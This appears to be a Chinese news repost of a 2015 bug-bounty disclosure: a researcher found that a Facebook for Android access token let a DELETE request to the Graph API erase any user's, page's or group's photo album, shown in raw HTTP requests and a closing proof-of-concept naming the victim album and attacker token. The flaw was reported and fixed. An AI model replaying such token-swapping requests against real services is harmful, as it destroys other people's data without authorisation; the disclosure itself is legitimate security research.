新闻链接：cc9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2j5X3q4G2i4K6u0W2x3K6j5H3i4K6u0W2j5$3&6Q4x3V1k6F1k6i4N6K6i4K6u0r3k6r3g2@1j5h3W2D9i4K6u0r3x3e0t1K6x3q4)9J5k6h3S2@1L8h3H3`.
   新闻时间：2015-02-13 12:03:15
   新闻正文：
概述： 如果你的照片被不知不觉删除了，你会怎么办？

很显然，这个问题很让人烦是吧？这篇文章就是要讲我发现的一个漏洞，它允许恶意用户删除Facebook上的任何相册。没错，任何用户、页面、群组的相册都能被删掉。

Graph API是开发人员用来读取并写入用户数据的一种主要方式。Facebook所有的app用的都是Graph API。一般来讲，Graph API要求一个访问token来读取或写入用户数据。

Facebook开发人员的文档指出，相册并不能通过Graph API中的相册节点被删除。
我尝试通过图片浏览器访问token删除了我的一个相册。

1
2
3
4
5
6
7
8
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm
3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

为什么？因为这个应用并不具备删除相册的功能。但是我们需要注意它的错误信息。它告诉我们，一些其他应用确实有调用这个API的功能。

我决定尝试Facebook的移动访问token，因为我们能看到Facebook移动app上删除所有相册的删除选项，不是吗？太好了。它用的是相同的API。所以我就拿了我自己的一个相册id跟Facebook的安卓访问token，并进行尝试。

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :-
true
Album(518171421550249) got deleted :D so whats the next step? Took
victim's album id and tried to delete it. I was very curious to see the
result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :-
true

天哪！相册被删掉了！所以我拿到了删除你们所有Facebook相册的密钥，哈哈。

我马上把这个漏洞报告给Facebook安全团队。他们的反应太迅速了，并且用了不到两小时就提供了修复方案。

最后是PoC:

1Request :-
2DELETE /<Victim's_photo_album_id> HTTP/1.1
3Host :  graph.facebook.com
4Content-Length: 245
5access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

如果你还不确定应该怎么做，请看下面的视频：
bfaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2&6i4K6u0W2N6s2k6Q4x3X3g2K6L8$3S2#2i4K6u0W2j5$3!0E0i4K6u0r3N6i4y4Q4x3V1j5J5y4o6j5$3x3o6x3J5z5o6k6Q4x3V1j5%4z5o6b7K6y4K6b7#2x3g2)9J5k6i4y4Z5N6r3#2D9
Facebook安全团队发出的首份感谢信：3f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6p5&6x3X3f1K6x3r3u0X3y4e0l9#2z5h3g2U0k6r3k6T1i4K6u0W2K9Y4m8Y4

修复答复并奖励了我12500美元，表彰我对漏洞的报告。
现在，漏洞已完全修复。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课